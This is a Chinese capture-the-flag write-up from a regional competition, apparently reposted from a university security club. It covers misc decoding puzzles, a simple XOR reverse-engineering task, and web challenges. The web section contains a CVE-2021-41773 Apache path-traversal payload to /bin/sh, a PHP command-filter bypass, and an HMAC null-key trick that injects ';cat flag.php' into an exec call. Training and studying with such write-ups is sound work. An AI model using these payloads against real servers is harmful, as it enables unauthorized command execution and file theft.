强国杯分区赛北部赛区WriteUp
Misc
好多图图
docx解压
在wordtheme文件夹里
flag{aex4mv2nwr1gq857ztb3pflukycod0jh}编码的乐趣
1:文档给了佛曰但缺少“佛曰:”
哆密罰輸闍朋冥竟罰。參他俱喝多哆夷爍侄礙俱夢奢顛孕怯蒙三缽迦缽彌呐殿諳集奢夜喝怯神皤切缽涅闍不呐波侄夷梵漫那盧呐多諳利罰切奢藝奢薩槃吉明缽波奢伊豆皤怛缽室神缽至諳大耶勝冥集哆有即朋無諦冥婆跋娑怯彌呐咒彌哆提哆離侄夜槃恐侄礙以道冥跋冥竟遮漫朋俱呼怯那咒室夜諳神冥都諳伊死娑皤能等倒薩麼羯怯逝諳恐呐蒙婆罰苦皤遮瑟奢世諳栗礙俱那上諸陀冥藝波奢依竟冥盡侄尼伽夷數瑟藐梵夜俱諸奢若諦皤咒醯醯世呐怖罰阿無梵呼罰悉缽實盧涅除竟侄曳帝呐智穆亦冥穆不皤恐數冥孕冥依實俱諦諦智呐夢夷瑟薩利侄恐楞呐竟佛俱無藝跋提想楞耨奢勝夜侄悉遠豆諳滅沙缽亦除勝離醯罰諸呐伊菩梵知冥藝怯亦能缽三世故罰上謹曳缽醯侄諸闍諳地切提瑟吉盧怯以咒俱離呐集諸切侄實缽帝奢亦罰迦勝冥數哆利奢所竟俱依羯瑟特呼僧怖缽帝數罰者喝缽知悉故切爍穆娑缽漫罰夜皤闍梵蘇俱上勝豆缽羯缽沙怯數俱隸罰遠皤能諳楞知哆三陀多盧哆數婆梵漫伽夜謹缽楞恐呐切皤怛諳菩缽藝隸缽恐所都爍怯伽麼2:补全解佛曰得到核心价值观编码
3:解核心价值观编码得到MD5f52d7bd4870ac30e5a7cff83a73af7074:解MD5得到flag
flag{jGfR0us1AMZho3uZPl}Web
Execute command
CVE-2021-41773 apache目录穿越漏洞
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
guomi
抓包找到参数func和p,尝试用system去执行命令,发现被过滤了
fuzz发现readfile函数可以使用 得到源码
<?php
$disable_fun = array("file_get_contents","exec","shell_exec","system","ls","passthru","proc_open","cat /tmp/flagqlklg","tac /tmp/flagqlklg","more /tmp/flagqlklg","less /tmp/flagqlklg","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
if (!in_array($p,$disable_fun)){
echo gettime($func,$p);
}else{
die("you are Hacker....");
}
#echo gettime($func, $p);
}else {
die("you are Hacker...");
}
}
?>过滤了这么多
"file_get_contents","exec","shell_exec","system","ls","passthru","proc_open","cat /tmp/flagqlklg","tac /tmp/flagqlklg","more /tmp/flagqlklg","less /tmp/flagqlklg","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"里面有疑似flag的文件路径,用反斜杠绕过
func=system&p=cat /tmp/flagqlklg
web_Huluwa
查看源码,在huluwa.mp3文件尾找到题目源码
if(empty($_POST['Huluxiaojinggang']) || empty($_POST['Shejing'])){
die('看我四娃喷火!看我五娃喷水!');
}
$secret = getenv("secret");
if(isset($_POST['yeye']))
$secret = hash_hmac('sha256', $_POST['yeye'], $secret);
$qwer = hash_hmac('sha256', $_POST['Shejing'], $secret);
if($qwer !== $_POST['Huluxiaojinggang']){
die('看我大娃 正蹬,鞭腿,刺拳,训练有素。');
}
echo exec("nc".$_POST['Shejing']);我们要传入Huluxiaojinggang和Shejing值,让其不能为空
之后对传入的White-cat-monitor进行加密
接着判断,然后需要用到yeye的值去执行找flag
现在我们不知道加密的密钥,也就是环境变量的内容
这里需要知道一点,使用sha256加密时传入加密数据为数组,加密后会返回null
如果加密的密钥$key为null的话,生成的哈希值也是我们所知的
传入yeye为数组,则secret为null,我们就可以控制qwer的传参了
所以我们令Shejing为
;cat flag.php加密,密钥为NULL
04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
最后传参
Huluxiaojinggang=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&Shejing=;cat flag.php
re
re1
主逻辑函数
跟进后发现反编译失败
改下ida配置文件即可
拉到最后可以看到主要加密逻辑
简单的异或 注意大小端解密即可
enc = 'i~lqy~x7Fky}{cb{m{x}kynkyw'
key = 10
flag = ''
for i in range(len(enc)):
flag += chr(ord(enc[i:i+1])^key)
print(flag)
#ctf{stuaswqihqgqrwasdas}长
按
关
注
网络安全社团公众号
微信号 : qlnu_ctf
新浪微博:齐鲁师范学院网络安全社团
原文始发于微信公众号(齐鲁师院网络安全社团):强国杯分区赛北部赛区WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论